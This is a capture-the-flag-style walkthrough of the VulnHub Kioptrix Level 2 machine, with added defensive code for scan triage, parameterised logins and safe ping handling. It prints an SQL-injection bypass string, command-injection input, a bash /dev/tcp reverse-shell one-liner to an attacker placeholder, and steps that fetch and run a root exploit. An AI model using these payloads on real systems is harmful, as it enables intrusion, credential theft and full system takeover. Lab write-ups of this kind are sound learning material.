WalkThrough! Kioptrix — 2 By VulnHub

Kamran Saifullah
7 min read · Mar 12, 2018


Hi,

Like my previous walkthrough, which was on Kioptrix Level 1, this one is on the Kioptrix Level 2 machine. This machine is also easy to exploit: it is very straightforward, and so are the exploitation phases. So let’s move on.

The Kioptrix-2 machine can be found at the link below:

https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

The VM is mounted the same way as the other machines.

As always, the first step is to find the IP address of the Kioptrix-2 machine, so the command is the same as always, i.e.:

netdiscover -i eth0

Once I had the IP address of the Kioptrix-2 machine, the next step was port scanning. The command for that was:

root@w4tchd0g:~# nmap -Pn -T4 -A -v 192.168.97.135

Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-12 10:01 EDT
NSE: Loaded 146 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 10:01
Completed NSE at 10:01, 0.00s elapsed
Initiating NSE at 10:01
Completed NSE at 10:01, 0.00s elapsed
Initiating ARP Ping Scan at 10:01
Scanning 192.168.97.135 [1 port]
Completed ARP Ping Scan at 10:01, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:01
Completed Parallel DNS resolution of 1 host. at 10:01, 0.40s elapsed
Initiating SYN Stealth Scan at 10:01
Scanning 192.168.97.135 [1000 ports]
Discovered open port 80/tcp on 192.168.97.135
Discovered open port 443/tcp on 192.168.97.135
Discovered open port 3306/tcp on 192.168.97.135
Discovered open port 22/tcp on 192.168.97.135
Discovered open port 111/tcp on 192.168.97.135
Discovered open port 631/tcp on 192.168.97.135
Discovered open port 777/tcp on 192.168.97.135
Completed SYN Stealth Scan at 10:01, 0.22s elapsed (1000 total ports)
Initiating Service scan at 10:01
Scanning 7 services on 192.168.97.135
Completed Service scan at 10:02, 12.26s elapsed (7 services on 1 host)
Initiating OS detection (try #1) against 192.168.97.135
NSE: Script scanning 192.168.97.135.
Initiating NSE at 10:02
Completed NSE at 10:02, 2.21s elapsed
Initiating NSE at 10:02
Completed NSE at 10:02, 0.01s elapsed
Nmap scan report for 192.168.97.135
Host is up (0.00085s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 2.0.52 ((CentOS))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 774/udp status
|_ 100024 1 777/tcp status
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: md5WithRSAEncryption
| Not valid before: 2009-10-08T00:10:47
| Not valid after: 2010-10-08T00:10:47
| MD5: 01de 29f9 fbfb 2eb2 beaf e624 3157 090f
|_SHA-1: 560c 9196 6506 fb0f fb81 66b1 ded3 ac11 2ed4 808a
|_ssl-date: 2018-03-11T17:01:02+00:00; -21h01m11s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC4_128_WITH_MD5
|_ SSL2_DES_64_CBC_WITH_MD5
631/tcp open ipp CUPS 1.1
| http-methods:
| Supported Methods: GET HEAD OPTIONS POST PUT
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
777/tcp open status 1 (RPC #100024)
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:54:51:FD (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9-2.6.30
Uptime guess: 0.144 days (since Mon Mar 12 06:34:44 2018)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=205 (Good luck!)
IP ID Sequence Generation: All zeros

Host script results:
|_clock-skew: mean: -21h01m11s, deviation: 0s, median: -21h01m11s

TRACEROUTE
HOP RTT ADDRESS
1 0.85 ms 192.168.97.135

NSE: Script Post-scanning.
Initiating NSE at 10:02
Completed NSE at 10:02, 0.00s elapsed
Initiating NSE at 10:02
Completed NSE at 10:02, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.90 seconds
Raw packets sent: 1020 (45.626KB) | Rcvd: 1016 (41.366KB)
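The scan above already contains most of what a defender would put on a fix list: SSH protocol 1, SSLv2, an MD5-signed certificate that expired in 2010, a risky PUT method on CUPS and a MySQL port reachable from the network. As an added example (not part of the original walkthrough), here is a small triage script that turns nmap's normal-output text into findings. The embedded sample is an excerpt of the scan output shown in the post, written the way nmap prints it (plain hyphens in dates); the rule texts and the scan date are my own choices.

```python
"""Triage of nmap -A normal output into defender findings.
Added example; the rules and thresholds are this author's, not nmap's."""
import re
from datetime import date, datetime

# Excerpt of the scan output from the post, embedded so the example runs offline.
NMAP_OUTPUT = """\
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 2.0.52 ((CentOS))
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))
| Signature Algorithm: md5WithRSAEncryption
| Not valid after: 2010-10-08T00:10:47
| sslv2:
| SSLv2 supported
631/tcp open ipp CUPS 1.1
|_ Potentially risky methods: PUT
777/tcp open status 1 (RPC #100024)
3306/tcp open mysql MySQL (unauthorized)
"""

# "22/tcp open ssh OpenSSH 3.9p1 ..." -> port, proto, state, service
PORT_LINE = re.compile(r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\w+)\s+(?P<service>\S+)")

# (pattern matched against an NSE script line, finding text). A rule applies to
# the port whose block the line belongs to. {0} is filled from the regex group.
SCRIPT_RULES = [
    (re.compile(r"Server supports SSHv1"), "SSH protocol 1 enabled (no integrity protection; disable)"),
    (re.compile(r"SSLv2 supported"), "SSLv2 enabled (disable; allow TLS 1.2+ only)"),
    (re.compile(r"md5WithRSAEncryption"), "certificate signed with MD5 (collision-prone; reissue with SHA-256)"),
    (re.compile(r"Potentially risky methods: (.+)"), "risky HTTP methods advertised: {0}"),
]

# Services that should never be reachable from the scanning network.
EXPOSED_SERVICES = {
    "mysql": "database port reachable from the network (bind to localhost or firewall it)",
}


def triage(output: str, scan_date: str) -> list:
    """Return (port, finding) pairs for one host's nmap normal-output text.
    scan_date is an ISO date ('2018-03-12') used for certificate expiry checks."""
    today = date.fromisoformat(scan_date)
    findings = []
    port = None
    for raw in output.splitlines():
        line = raw.strip()
        m = PORT_LINE.match(line)
        if m:
            port = int(m.group("port"))
            service = m.group("service")
            if m.group("state") == "open" and service in EXPOSED_SERVICES:
                findings.append((port, EXPOSED_SERVICES[service]))
            continue
        if port is None:
            continue  # header lines before the port table
        body = line.lstrip("|_ ")  # strip nmap's script-output tree markers
        for rule, text in SCRIPT_RULES:
            sm = rule.search(body)
            if sm:
                findings.append((port, text.format(*sm.groups())))
        em = re.match(r"Not valid after:\s*(\S+)", body)
        if em:
            expiry = datetime.fromisoformat(em.group(1)).date()
            if expiry < today:
                findings.append((port, f"certificate expired on {expiry.isoformat()}"))
    return findings


if __name__ == "__main__":
    for port, finding in triage(NMAP_OUTPUT, "2018-03-12"):
        print(f"{port:>5}  {finding}")
```

Run on the full scan output it would also pick up the second expiry line and the OS fingerprint, because the parser only keys on the port table and the `|`-prefixed script lines; anything else is ignored, which keeps it tolerant of the NSE chatter at the top and bottom of a verbose run.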

Once I had the port scan results and saw that ports 80 and 443 were open, I knew it was a web server and that some pages would be served when the IP address was opened in a browser. So I opened the browser, browsed to the IP address and found a login page right there.

Since a login panel was up, I thought of trying default credentials, i.e. “admin:admin”, “root:toor”, “admin:admin123”, “ : ” and so on, but none of them worked. So I thought of bypassing the login panel and tried (‘or’1'=’1) as both username and password, and boom, I was inside the admin panel.
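The bypass works because the login page builds its SQL query by string concatenation, so the quotes in the input close the string literal and the rest becomes SQL. The following added example (not the machine's own index.php, whose source the post does not show) reproduces that query against an in-memory SQLite table and places it beside a hardened login that uses a parameterised query and a salted PBKDF2 hash. The schema, the `admin` account and its password are constructed for the demo; the payload string is the one from the post.

```python
"""String-built login query vs. parameterised query with password hashing.
Added example; the table and credentials are constructed for the demo."""
import hashlib
import hmac
import os
import sqlite3

PAYLOAD = "'or'1'='1"  # the bypass string used in the post, as typed


def _hash(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)


def make_db() -> sqlite3.Connection:
    """One user. The clear-text `password` column exists only so the vulnerable
    query below can be reproduced; the hardened path never reads it."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT, salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    db.execute("INSERT INTO users VALUES (?, ?, ?, ?)",
               ("admin", "s3cret", salt, _hash("s3cret", salt)))
    return db


def vulnerable_login(db: sqlite3.Connection, username: str, password: str) -> bool:
    """Classic PHP-era pattern: user input interpolated into the SQL text.
    With PAYLOAD the WHERE clause becomes
        username=''or'1'='1' AND password=''or'1'='1'
    and the trailing or '1'='1' makes it true for every row."""
    query = f"SELECT 1 FROM users WHERE username='{username}' AND password='{password}'"
    return db.execute(query).fetchone() is not None


def safe_login(db: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterised lookup (the input is bound as data, never parsed as SQL),
    then constant-time comparison of the password hash."""
    row = db.execute("SELECT salt, pw_hash FROM users WHERE username=?", (username,)).fetchone()
    if row is None:
        return False
    salt, pw_hash = row
    return hmac.compare_digest(_hash(password, salt), pw_hash)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, payload:", vulnerable_login(db, PAYLOAD, PAYLOAD))  # True
    print("hardened,   payload:", safe_login(db, PAYLOAD, PAYLOAD))        # False
```

Note that the parameter binding alone is the injection fix; the hash is there because a login that compares clear-text passwords in SQL would still leak every credential the moment the database is read, which is exactly what happens later in this walkthrough when the MySQL credentials turn up in a web file.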

The page said “Ping a Machine on the Network”, which means we can run some commands. I tried entering text and it was reflected on the page like this:

So I tried the terminator “;” (semicolon) to see how the server/web page responded, and found that it wasn’t being returned as text, meaning it was being executed. From there I was sure that command injection was present. Before this I had tried the “ls -la” command and it was just being redirected, but the terminator was what made the commands execute. Then I ran “ls -la” again together with the terminator and boom, it worked.
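The ping form is exploitable because the submitted value is concatenated into a shell command line, so `;` ends the ping and starts whatever follows. As an added example (the post does not show pingit.php's source, so this is a reconstruction of the pattern, not the machine's code), here is the concatenation beside a hardened version that validates the input as a literal IP address and runs ping without a shell, plus a small check of the kind you would log on the server side. Function names are mine.

```python
"""Command-string concatenation vs. validated argv without a shell.
Added example; the ping options and function names are this author's."""
import ipaddress
import subprocess

SHELL_METACHARS = set(";|&$`\n<>")


def vulnerable_command(host: str) -> str:
    """What the shell receives when the form value is concatenated into the
    command text. Returned as a string and never executed here; it only makes
    the injection point visible."""
    return "ping -c 3 " + host


def build_ping_argv(host: str) -> list:
    """Validate `host` as a literal IPv4/IPv6 address and return an argv list.
    ipaddress.ip_address raises ValueError for hostnames, whitespace inside the
    value, or any shell metacharacter, so `127.0.0.1; ls -la` never gets through."""
    ip = ipaddress.ip_address(host.strip())
    return ["ping", "-c", "3", str(ip)]


def safe_ping(host: str, timeout: float = 10.0) -> str:
    """Run ping with an argv list: each element reaches execve as one argument,
    so there is no shell to interpret `;`. The timeout bounds a slow target."""
    proc = subprocess.run(build_ping_argv(host), capture_output=True, text=True, timeout=timeout)
    return proc.stdout


def is_injection_attempt(host: str) -> bool:
    """Server-side signal worth logging: the value is not a bare IP address and
    carries shell metacharacters."""
    try:
        ipaddress.ip_address(host.strip())
        return False
    except ValueError:
        return any(ch in SHELL_METACHARS for ch in host)


if __name__ == "__main__":
    print(vulnerable_command("127.0.0.1; ls -la"))   # both commands would run under sh -c
    print(build_ping_argv("127.0.0.1"))               # ['ping', '-c', '3', '127.0.0.1']
    print(is_injection_attempt("127.0.0.1; ls -la"))  # True
```

Allow-listing the value as an IP address is stronger than escaping because it also rejects hostnames, which would otherwise let the form be used to resolve and ping arbitrary targets on the administrator's behalf; if hostnames are a requirement, validate them against a strict hostname grammar and still pass them as a separate argv element.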

Okay, so now let’s try to grab ‘/etc/passwd’.

Fine. Similarly, we can run all the commands we need to gather information. From here onward I was thinking about how we are going to get a reverse shell. I already knew about Netcat, and it is one of the best tools I have ever used. So I quickly googled for an overview of the commands and details and found this website useful:

https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf

So now my goal was to send a reverse connection from the site and set Netcat to listening mode on my machine. The command to set Netcat to listening mode was:

nc -nlvp 443

The command to set up the reverse connection was:

bash -i >& /dev/tcp/<attacker's IP>/443 0>&1

After this, Netcat showed that we had got the reverse connection.

I quickly ran the ‘ls’ command and found 2 PHP files:

  1. index.php
  2. pingit.php

On looking into the index.php file I found the username and password for the MySQL server, meaning we can log into the MySQL server using those credentials.

But the issue was getting root access, and obviously we would have to look for a particular exploit, so I checked the OS details:

lsb_release -a

From here I got the details about the operating system: the machine was running CentOS version 4.5. After this I quickly googled for CentOS 4.5 exploits on Exploit-DB and found one result.

So my next step was to download this exploit onto the machine. On trying the wget command it showed me an error.

Even after using ‘--no-check-certificate’ the file wasn’t downloading. So I got the idea to host the exploit on the Apache server on my own machine, download it from the target machine and execute it there. So the commands were:

root@w4tchd0g:~/Desktop# gcc -o toRun 9542.c

root@w4tchd0g:~/Desktop# cp toRun /var/www/html

root@w4tchd0g:~/Desktop# service apache2 start

Now on the target’s system it was quite simple:

bash-3.00$ wget http://myMachineIp/toRun

Once downloaded, I gave it “Read, Write & Execute” permissions:

bash-3.00$ chmod 755 toRun

bash-3.00$ ./toRun

Boom, the b0x has been successfully exploited and we have gained root privileges.

Written by Kamran Saifullah

Malware/RE/Firmware Analysis, App Sec/Off Sec, VAPT, Phishing Simulations/SE | Risk Management, IS Governance, Audits, ISO 27001 LI